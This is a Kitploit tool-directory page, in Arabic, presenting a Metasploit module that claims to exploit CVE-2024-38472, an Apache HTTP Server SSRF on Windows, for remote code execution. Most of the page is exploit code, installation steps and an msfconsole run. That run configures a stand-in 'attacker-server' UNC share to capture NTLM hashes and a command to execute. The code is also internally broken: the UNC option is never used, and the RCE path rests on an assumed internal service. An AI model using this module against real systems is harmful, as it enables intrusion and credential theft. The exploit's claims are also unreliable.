Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-38472 — وحدة Metasploit التي تستغل CVE-2024-38472 (SSRF) في خادم Apache HTTP على ويندوز لتحقيق تنفيذ الأوامر عن بعد عبر التفاعل مع الخدمة الداخلية. | Kitploit
أدوات/GitHubGitHub/abdurahmon3236/cve-2024-38472
أطر اختبار الاختراقأطر الاستغلالتحليل الثغرات الأمنيةالحركة الجانبيةاستغلال تطبيقات الويبما بعد الاستغلالالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubabdurahmon3236/cve-2024-38472

CVE-2024-38472

وحدة Metasploit التي تستغل CVE-2024-38472 (SSRF) في خادم Apache HTTP على ويندوز لتحقيق تنفيذ الأوامر عن بعد عبر التفاعل مع الخدمة الداخلية.

4منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

إن إنشاء وحدة Metasploit لتنفيذ الأكواد عن بُعد (RCE) لثغرة SSRF (CVE-2024-38472) في خادم Apache HTTP على Windows هو أمر صعب لأن SSRF بحد ذاتها لا تؤدي مباشرة إلى RCE. ومع ذلك، يمكن أن تكون SSRF غالبًا خطوة نحو تحقيق RCE، خاصة إذا كان بإمكانك استخدامها للتفاعل مع الخدمات الداخلية أو تشغيل ثغرة ثانوية.

استراتيجية RCE عبر SSRF

لتحقيق RCE عبر SSRF، نحتاج عمومًا إلى:

  1. خدمة داخلية قابلة للاختراق عبر هجوم معين يمكن استغلاله عبر SSRF.
  2. سوء تكوين أو ثغرة إضافية تسمح بتنفيذ الأكواد التعسفي.

في هذا المثال، لنفترض أننا نستطيع تشغيل خدمة ثانوية داخليًا تقبل طلبات HTTP ويمكن خداعها لتنفيذ أكواد تعسفية (مثل خادم Jenkins أو خدمة أخرى بواجهة برمجة تطبيقات مكشوفة).

مثال لوحدة Metasploit

سنقوم بصياغة وحدة Metasploit تحاول تحقيق RCE عن طريق استغلال SSRF للتفاعل مع خدمة داخلية. في هذه الحالة، سنمحاكاة خادم Jenkins داخلي مع وحدة تحكم برمجية مكشوفة يمكننا إساءة استخدامها لـ RCE.

احفظ الكود التالي باسم apache_unc_ssrf_rce.rb في دليل modules/exploits/multi/http لتثبيت Metasploit Framework لديك.

root@kitploit:~
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache HTTP Server Windows UNC SSRF to RCE',
      'Description'    => %q{
        This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
        which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
        services like Jenkins.
      },
      'Author'         =>
        [
          'Your Name'  # Your name or handle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-38472'],
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => ['win'],
      'Arch'           => [ARCH_CMD],
      'Targets'        => [
        ['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
      ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOSTS,
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
        OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
        OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
        OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
    })

    if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    ssrf_payload = {
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path),
      'version' => '1.1',
      'headers' => {
        'Host' => datastore['RHOSTS'],
        'Content-Type' => 'application/x-www-form-urlencoded'
      },
      'data'    => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
    }

    begin
      print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
      res = send_request_cgi(ssrf_payload)

      if res && res.code == 200
        print_good("Successfully triggered the internal service")
      else
        print_error("Failed to trigger the internal service: #{res.inspect}")
      end
    rescue ::Rex::ConnectionError => e
      print_error("Connection failed: #{e.message}")
    rescue ::Interrupt
      print_status("User interrupted the module execution")
    rescue ::Exception => e
      print_error("An unexpected error occurred: #{e.message}")
    end
  end
end

تعليمات الاستخدام

  1. احفظ الوحدة: احفظ الوحدة باسم apache_unc_ssrf_rce.rb في دليل modules/exploits/multi/http لتثبيت Metasploit Framework لديك.

    root@kitploit:~
    /path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
    
  2. تحميل Metasploit: ابدأ تشغيل Metasploit Framework بفتح طرفية وتشغيل:

    root@kitploit:~
    msfconsole
    
  3. استخدام الوحدة الجديدة: في وحدة تحكم Metasploit، قم بتحميل وحدة الاستغلال الجديدة باستخدام الأمر التالي:

    root@kitploit:~
    use exploit/multi/http/apache_unc_ssrf_rce
    
  4. التكوين والتشغيل: قم بتعيين الخيارات الضرورية، مثل RHOSTS و RPORT و TARGETURI و UNC_SERVER و INTERNAL_SERVICE و CMD. ثم قم بتشغيل الوحدة.

اعتبارات مهمة

  • تأكد من حصولك على الأذونات المناسبة قبل اختبار أو استغلال أي أنظمة.
  • هذه الوحدة مصممة للأغراض التعليمية والاختبارية. اختبر دائمًا في بيئة آمنة وخاضعة للرقابة قبل استخدامها على أي أنظمة إنتاج.

ترسل وحدة Metasploit المحسّنة هذه طلبًا مخصصًا إلى خادم Apache HTTP الضعيف على Windows، محاولةً تشغيل ثغرة SSRF والاستفادة منها لتحقيق RCE عن طريق التفاعل مع خدمة داخلية. قم بتعديل الحمولة والوحدة حسب الحاجة بناءً على طبيعة الثغرة والبيئة المستهدفة.

تنزيل الأداة
root@kitploit:~
msf6 > use exploit/multi/http/apache_unc_ssrf_rce
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share
UNC_SERVER => \\attacker-server\share
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script
INTERNAL_SERVICE => http://internal-service/script
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(multi/http/apache_unc_ssrf_rce) > run